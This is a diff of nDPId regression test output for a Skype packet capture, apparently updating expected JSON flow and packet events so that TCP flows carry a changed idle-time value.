00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4bnAAAEARKjLAqAEiQTffETLdnFYAJDJym9gCRkbR2cp0xkwlV8oyn8X0NKXbrbkoGiloQw=="} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -310,8 +310,8 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/8JUAAEAR8n\/AqAEinTc4lzLdnFsAK42nm\/QCY347bApK+fSJyR3vpMK2pFmarm3qJcKY67tEOMSW2tE="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy1ywAAEARC+fAqAEinTc4pjLdnFYAHmpym\/YCUIZT7d8ZZahDgzlHGwrFeQgMHw=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -327,8 +327,8 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5cNoAAEARvzrAqAEinTfrnTLdnEoAJXKym\/4Cz\/csSQ42SRwcVm84KNSC1Bge6u0+CtZPiaQ="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431969664357,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969664357,"pkt":"AQBeAAABoPPBbTu2CABGrAAgAAAAAAECgoTAqAD+4AAAAZQEAAARZO6bAAAAAA=="} 00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -347,15 +347,15 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1GOEAAEAR4qLAqAEib91NjTLdnFQAIf21nAgChdWCG2VT3PvRM4JN\/HMVRe1geqFvmA=="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431969665006,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431969665006,"pkt":"PBXCt3IOxCwDBkn+CABGAAAgivAAAAEC9ufAqAFc4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} 00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} 